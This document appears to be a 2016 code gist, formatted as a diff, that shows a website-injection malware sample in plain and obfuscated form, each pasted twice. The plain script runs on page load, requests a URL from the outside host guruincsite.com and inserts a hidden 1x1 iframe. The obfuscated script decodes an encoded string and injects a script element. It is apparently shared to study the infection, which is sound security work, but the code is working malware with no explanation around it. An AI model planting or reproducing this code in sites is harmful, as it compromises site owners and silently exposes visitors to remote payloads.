gwillem · October 18, 2016 21:03
diff --git a/guruinc-nonobfuscated.html b/guruinc-nonobfuscated.html
 <script>
    document.addEventListener("DOMContentLoaded", start);

    function start() {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', 'http://guruincsite.com/1.php', false);
        xhr.send();
        if (xhr.status == 200) {
            var element = document.createElement('div');
            element.innerHTML = "<iframe src=" + xhr.responseText + " width='1' height='1' frameborder='0'></iframe>", element.id = 'div123';
            document.body.appendChild(element);
        }
    }
 </script>
diff --git a/guruinc-obfuscated.html b/guruinc-obfuscated.html
 <script>
 (function(){function LCWEHH(XHFER1){XHFER1=XHFER1["\u0073\u0070\u006c\u0069\u0074"]("");var F3R4XE=document["\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0073\u0042\u0079\u0054\u0061\u0067\u004e\u0061\u006d\u0065"]("\u0073\u0063\u0072\u0069\u0070\u0074")[document["\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0073\u0042\u0079\u0054\u0061\u0067\u004e\u0061\u006d\u0065"]("\u0073\u0063\u0072\u0069\u0070\u0074")["\u006c\u0065\u006e\u0067\u0074\u0068"]-1]["\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c"]["\u0073\u0070\u006c\u0069\u0074"]("\u000A"),MDNRTX=1+1+1-3,IFMIBA="",VYPXZ7="",A2S8FN=1-1;F3R4XE=F3R4XE[F3R4XE["\u006c\u0065\u006e\u0067\u0074\u0068"]-1]["\u006c\u0065\u006e\u0067\u0074\u0068"]+"";F3R4XE=F3R4XE["\u0073\u0070\u006c\u0069\u0074"]("");for(var i=1+1-1-1;i<XHFER1["\u006c\u0065\u006e\u0067\u0074\u0068"];i=i+2-1+1){if(F3R4XE["\u006c\u0065\u006e\u0067\u0074\u0068"]==MDNRTX){MDNRTX=1+1+1-3;}VYPXZ7=parseInt(XHFER1[i]+XHFER1[i+1],54-24)-F3R4XE[MDNRTX]["\u0063\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0041\u0074"](1-1+1-1)-A2S8FN;IFMIBA+=String["\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065"](VYPXZ7);A2S8FN=VYPXZ7;MDNRTX++}return IFMIBA}LCWEHH=LCWEHH("5e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92")["\u0073\u0070\u006c\u0069\u0074"]("\u000A");
 (function(){var QW5A2W=document[LCWEHH[5-4+5-2]](LCWEHH[1+1-2]);var XL04JH=document[LCWEHH[4+2-1+0]](LCWEHH[1-2+2])[0];QW5A2W=XL04JH[LCWEHH[11-5]](QW5A2W,XL04JH[LCWEHH[15-8]]);QW5A2W[LCWEHH[7+15-14]](LCWEHH[4+3-5],LCWEHH[6+4+5-12]);if(!document[LCWEHH[15+2-8]]){QW5A2W[LCWEHH[13-3]](LCWEHH[2-4+1+3])}}())}())
 ;</script>
	<script>
	document.addEventListener("DOMContentLoaded", start);

	function start() {
	var xhr = new XMLHttpRequest();
	xhr.open('GET', 'http://guruincsite.com/1.php', false);
	xhr.send();
	if (xhr.status == 200) {
	var element = document.createElement('div');
	element.innerHTML = "<iframe src=" + xhr.responseText + " width='1' height='1' frameborder='0'></iframe>", element.id = 'div123';
	document.body.appendChild(element);
	}
	}
	</script>
	<script>
	(function(){function LCWEHH(XHFER1){XHFER1=XHFER1["\u0073\u0070\u006c\u0069\u0074"]("");var F3R4XE=document["\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0073\u0042\u0079\u0054\u0061\u0067\u004e\u0061\u006d\u0065"]("\u0073\u0063\u0072\u0069\u0070\u0074")[document["\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0073\u0042\u0079\u0054\u0061\u0067\u004e\u0061\u006d\u0065"]("\u0073\u0063\u0072\u0069\u0070\u0074")["\u006c\u0065\u006e\u0067\u0074\u0068"]-1]["\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c"]["\u0073\u0070\u006c\u0069\u0074"]("\u000A"),MDNRTX=1+1+1-3,IFMIBA="",VYPXZ7="",A2S8FN=1-1;F3R4XE=F3R4XE[F3R4XE["\u006c\u0065\u006e\u0067\u0074\u0068"]-1]["\u006c\u0065\u006e\u0067\u0074\u0068"]+"";F3R4XE=F3R4XE["\u0073\u0070\u006c\u0069\u0074"]("");for(var i=1+1-1-1;i<XHFER1["\u006c\u0065\u006e\u0067\u0074\u0068"];i=i+2-1+1){if(F3R4XE["\u006c\u0065\u006e\u0067\u0074\u0068"]==MDNRTX){MDNRTX=1+1+1-3;}VYPXZ7=parseInt(XHFER1[i]+XHFER1[i+1],54-24)-F3R4XE[MDNRTX]["\u0063\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0041\u0074"](1-1+1-1)-A2S8FN;IFMIBA+=String["\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065"](VYPXZ7);A2S8FN=VYPXZ7;MDNRTX++}return IFMIBA}LCWEHH=LCWEHH("5e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92")["\u0073\u0070\u006c\u0069\u0074"]("\u000A");
	(function(){var QW5A2W=document[LCWEHH[5-4+5-2]](LCWEHH[1+1-2]);var XL04JH=document[LCWEHH[4+2-1+0]](LCWEHH[1-2+2])[0];QW5A2W=XL04JH[LCWEHH[11-5]](QW5A2W,XL04JH[LCWEHH[15-8]]);QW5A2W[LCWEHH[7+15-14]](LCWEHH[4+3-5],LCWEHH[6+4+5-12]);if(!document[LCWEHH[15+2-8]]){QW5A2W[LCWEHH[13-3]](LCWEHH[2-4+1+3])}}())}())
	;</script>